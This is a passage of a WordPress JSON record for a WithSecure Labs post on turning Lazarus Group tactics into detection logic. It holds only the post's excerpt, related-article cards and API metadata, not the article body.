wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/&#038;title=Catching%20Lazarus:%20Threat%20Intelligence%20to%20Real%20Detection%20Logic%20&#8211;%20Part%20One\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Catching Lazarus: Threat Intelligence to Real Detection Logic &#8211; Part One&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Partager sur X (Twitter)\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/darkgate-rises\/\">En savoir plus<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Reverse engineering a Lumma infection<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Lumma is an information stealer that the WithSecure Detection and Response Team (DRT) have encountered several times. It has seen wider use over the past couple of years, and makes for an interesting threat to monitor.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/reverse-engineering-a-lumma-infection\/\">En savoir plus<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Machine learning-driven malware analysis<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">With the rapid emergence of new malware variants, accurately classifying and attributing malware samples has become more challenging than ever<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/machine-learning-driven-malware-analysis\/\">En savoir plus<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>This is the first of two blog posts from the F-Secure Countercept team discussing how the Tactics, Techniques and Procedures (TTPs) used by the Lazarus Group in a recent campaign can be turned into detection logic.<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[306,328,308],"labs_content_type":[309],"class_list":["post-10533","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-endpoint-security","category-threat-intelligence"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Endpoint Security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Catching Lazarus: Threat Intelligence to Real Detection Logic &#8211; Part One<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">This is the first of two blog posts from the F-Secure Countercept team discussing how the Tactics, Techniques and Procedures (TTPs) used by the Lazarus Group in a recent campaign can be turned into detection logic.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/\">En savoir plus<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/lab_item\/10533","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/media?parent=10533"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/categories?post=10533"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/labs_content_type?post=10533"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}